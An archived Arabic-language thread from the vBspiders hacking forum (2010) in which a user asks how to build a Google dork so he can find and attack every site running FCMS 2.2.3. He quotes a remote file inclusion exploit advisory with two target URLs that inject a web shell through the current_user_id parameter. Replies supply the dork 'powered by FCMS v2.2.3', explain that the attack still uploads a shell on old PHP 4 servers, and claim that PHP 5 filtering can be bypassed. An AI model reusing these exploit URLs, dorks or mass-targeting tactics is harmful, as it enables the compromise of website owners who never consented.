:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   ممكن طريقة معرفة دوووورك ثغرة ريموت فايل انكلود Remote File Inclusion (http://www.vbspiders.com/vb/showthread.php?t=36942)

مستر نوبا 09-11-2010 12:34 AM
ممكن طريقة معرفة دوووورك ثغرة ريموت فايل انكلود Remote File Inclusion
 
السلام عليكم


اخواني انا حصلت ثغرة فايل انكلود ولا عرفت كيف اطلع الدورك لهذا الثغره لاني ابي ابحث بحث عشوائي لكل المواقع الي

مركبه هالسكربت المصاب ياليت تقولون لي كيف اطلع الدورك لها لاني دخلت الثغرة ولا حصلت لها دورك

مثال على ثغرة فايل انكلود الي ماحصلت فيها الدووورك

كود:
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
[x] Date: 10-9-2010]
[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[x] Software Link: [http://www.familycms.com/getstarted.php]
[x] Version: [v 2.2.3 ]
[x]Tested on: [Windows XP]
[x] CVE :
[x] My E-MaIl:LoSt.HaCkEr[at]HaCkEr[dot]Ps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/familynews.php?current_user_id=[shell]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Greetings:  No Greet

ViRuS Qalaa 09-11-2010 12:55 AM
[align=center]الدورك :
powered by FCMS v2.2.3
او نزل السكريب وشوف لك كلام موجود بلسكريب وابحث بقوقل
وافضل لك ترى ثغرات الفايل انكود انقرضت لذلك ماانصحك فية
وشكرا[/align]

MazMaz 09-15-2010 10:35 PM
حتى لو وجدت ثغرة فايل انكلود فستجد مشاكل باستغلالها لأنه كما قال انقرضت

dz-fox 09-16-2010 04:12 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ViRuS Qalaa (المشاركة 216055)
[align=center]الدورك :
powered by FCMS v2.2.3
او نزل السكريب وشوف لك كلام موجود بلسكريب وابحث بقوقل
وافضل لك ترى ثغرات الفايل انكود انقرضت لذلك ماانصحك فية
وشكرا[/align]
[align=center]انقرضت ؟ و هل هي حيوان لكي تنقرض هههه ؟

لا الحكاية كلها ان ثغرة الانكلود لا تعمل في الاصدار الخامس للـ php

و الاصدار الخامس اصبح منشر بكثرة لذلك تجد الكثيرين لا يستطيعون رفع الشل

أما ان وجدت سيرفر مركب الاصدار الرابع (و هذا ان كان السيرفر قديم)

فسيكون الاستغلال عادي و يترفع الشل[/align]

ViRuS Qalaa 09-16-2010 05:06 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة dz-fox (المشاركة 218655)
[align=center]انقرضت ؟ و هل هي حيوان لكي تنقرض هههه ؟

[/align]
لاتعليق smilies9

anakaser1 12-25-2010 10:20 PM
اكيد الثغره انقرضت او بالاصح الفلتره تمنع ظهور الثغره
ويوجد طرق لتخطي فلترة الاصدار الخامس
وذلك رفع الشل على الموقع المصاب

ارجوا مناقشة هذا الكلام
-----------------
anakaser1


الساعة الآن 01:34 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0